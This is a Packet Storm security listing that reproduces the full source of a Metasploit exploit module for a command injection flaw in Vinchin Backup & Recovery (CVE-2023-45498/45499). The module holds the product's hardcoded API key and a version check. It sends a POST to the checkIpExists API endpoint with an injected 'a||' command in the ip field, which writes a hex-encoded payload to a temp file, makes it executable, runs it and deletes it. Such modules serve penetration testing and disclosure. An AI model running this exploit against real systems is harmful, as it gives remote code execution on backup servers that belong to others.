Lucene search

Valentin Lobstein, Gregory Boddin, metasploit.comPACKETSTORM:176289

HistoryDec 21, 2023 - 12:00 a.m.

Vinchin Backup And Recovery Command Injection

2023-12-2100:00:00

Valentin Lobstein, Gregory Boddin, metasploit.com

packetstormsecurity.com

207

vinchin backup recovery

command injection

vulnerability discovery

metasploit module

cve

insufficient input validation

api endpoint

arbitrary commands

web server

linux

unix

security breach

7.4 High

AI Score

Confidence

Low

0.003 Low

EPSS

Percentile

69.5%

JSON

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::CmdStager  
prepend Msf::Exploit::Remote::AutoCheck  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'Vinchin Backup and Recovery Command Injection',  
'Description' => %q{  
This module exploits a command injection vulnerability in Vinchin Backup & Recovery  
v5.0.*, v6.0.*, v6.7.*, and v7.0.*. Due to insufficient input validation in the  
checkIpExists API endpoint, an attacker can execute arbitrary commands as the  
web server user.  
},  
'License' => MSF_LICENSE,  
'Author' => [  
'Gregory Boddin (LeakIX)', # Vulnerability discovery  
'Valentin Lobstein' # Metasploit module  
],  
'References' => [  
['CVE', '2023-45498'],  
['CVE', '2023-45499'],  
['URL', 'https://blog.leakix.net/2023/10/vinchin-backup-rce-chain/'],  
['URL', 'https://vinchin.com/'] # Vendor URL  
],  
'DisclosureDate' => '2023-10-26',  
'Notes' => {  
'Stability' => [ CRASH_SAFE ],  
'SideEffects' => [ IOC_IN_LOGS ],  
'Reliability' => [ REPEATABLE_SESSION ],  
'AKA' => ['Vinchin Command Injection']  
},  
'Platform' => ['linux', 'unix'],  
'Arch' => [ARCH_CMD],  
'Targets' => [  
['Automatic', {}]  
],  
  
'DefaultTarget' => 0,  
'DefaultOptions' => {  
'SSL' => true,  
'FETCH_WRITABLE_DIR' => '/usr/share/nginx/vinchin/tmp'  
},  
'Privileged' => false  
)  
)  
register_options(  
[  
Opt::RPORT(443),  
OptString.new('TARGETURI', [true, 'The base path to the Vinchin Backup & Recovery application', '/']),  
OptString.new('APIKEY', [true, 'The hardcoded API key', '6e24cc40bfdb6963c04a4f1983c8af71']),  
]  
)  
end  
  
def exploit  
hex_encoded_payload = payload.encoded.unpack('H*').first  
formatted_payload = hex_encoded_payload.scan(/../).map { |x| "\\\\x#{x}" }.join  
  
temp_file = "#{datastore['FETCH_WRITABLE_DIR']}/#{Rex::Text.rand_text_alpha(8)}"  
command = "echo -e #{formatted_payload}|tee #{temp_file};chmod 777 #{temp_file};#{temp_file};rm #{temp_file}"  
send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(datastore['TARGETURI'], 'api/'),  
'vars_get' => {  
'm' => '30',  
'f' => 'checkIpExists',  
'k' => datastore['APIKEY']  
},  
'data' => "p={\"ip\":\"a||#{command}\"}"  
})  
end  
  
def check  
target_uri_path = normalize_uri(target_uri.path, 'login.php')  
res = send_request_cgi('uri' => target_uri_path)  
  
return CheckCode::Unknown('Failed to connect to the target.') unless res  
return CheckCode::Unknown("Unexpected HTTP response code: #{res.code}") unless res.code == 200  
  
version_pattern = /Vinchin build: (\d+\.\d+\.\d+\.\d+)/  
version_match = res.body.match(version_pattern)  
  
unless version_match && version_match[1]  
return CheckCode::Unknown('Unable to extract version.')  
end  
  
version = Rex::Version.new(version_match[1])  
print_status("Detected Vinchin version: #{version}")  
  
if (version >= Rex::Version.new('5.0.0') && version < Rex::Version.new('5.1.0')) ||  
(version >= Rex::Version.new('6.0.0') && version < Rex::Version.new('6.1.0')) ||  
(version >= Rex::Version.new('6.7.0') && version < Rex::Version.new('6.8.0')) ||  
(version >= Rex::Version.new('7.0.0') && version < Rex::Version.new('7.0.2'))  
return CheckCode::Appears  
else  
return CheckCode::Safe  
end  
end  
end  
`